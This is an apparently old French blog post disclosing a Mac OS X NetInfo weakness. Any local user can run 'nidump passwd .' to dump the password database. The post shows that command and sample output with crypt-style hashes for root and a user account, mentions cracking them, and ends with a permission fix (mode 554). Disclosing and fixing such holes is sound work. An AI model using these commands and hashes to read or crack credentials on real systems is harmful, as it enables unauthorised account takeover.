Encore un trou béant !
Par Contributeur - Publié le
Si je vous ai souvent parlé (en bien) de ce système je ne vous ai pas encore mentionné l'existence d'outils en ligne de commande permettant de manipuler la base de données.
En effet on peut tout à fait utiliser les utilitaires nidump, niload, niutil... situés dans /usr/bin en lieu et place de l'interface graphique fournie par NetInfo Manager.
Observons alors le mode de /usr/bin/nidump puisque c'est ce programme qui va nous intéresser:
ls -l /usr/bin/nidump
-r-xr-xr-x 1 root wheel 23996 Apr 13 14:03 /usr/bin/nidump
On remarque que par défaut, les droits d'execution sont attribués à tous les utilisateurs. Le moindre quidam peut donc effectuer la commande suivante:
nidump passwd .
nobody:*:-2:-2::0:0:Unprivileged User:/dev/null:/dev/null
root:Opv7qRKislTRA:0:0::0:0:System Administrator:/var/root:/bin/tcsh
daemon:*:1:1::0:0:System Services:/var/root:/dev/null
unknown:*:99:99::0:0:Unknown User:/dev/null:/dev/null
smmsp:*:25:25::0:0:Sendmail User:/private/etc/mail:/dev/null
www:*:70:70::0:0:World Wide Web Server:/Library/WebServer:/dev/null
mysql:*:74:74::0:0:MySQL Server:/dev/null:/dev/null
sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/dev/null
coco:9cu9PTxXUp7aI:501:20::0:0:Coco:/Users/coco:/bin/bash
marie::502:20::0:0:Marie:/Users/marie:/bin/tcsh
juju::503:20::0:0:Juju:/Users/juju:/bin/tcsh
ftp:*:21:-21::0:0:Anonymous:/Users/ftp:/dev/null
news:*:250:250::0:0:News Server:/dev/null:/dev/null
biales:XXXXXXX:507:20::0:0::/Users/Utilisateurs_ftp/biales:/bin/tcsh
grouik:XXXXXXX:508:20::0:0::/Users/Utilisateurs_ftp/grouik:/bin/tcsh
guest:XXXXXXX:509:20::0:0::/Users/Utilisateurs_ftp/guest:/bin/tcsh
Et voilà une sortie au format
passwdtypique. N'importe quel bon cracker peut ensuite se charger de trouver les mots de passe, le tout sans aucun privilège...
La solution de secours consiste donc à supprimer les droits d'execution pour les
autres(mode 554).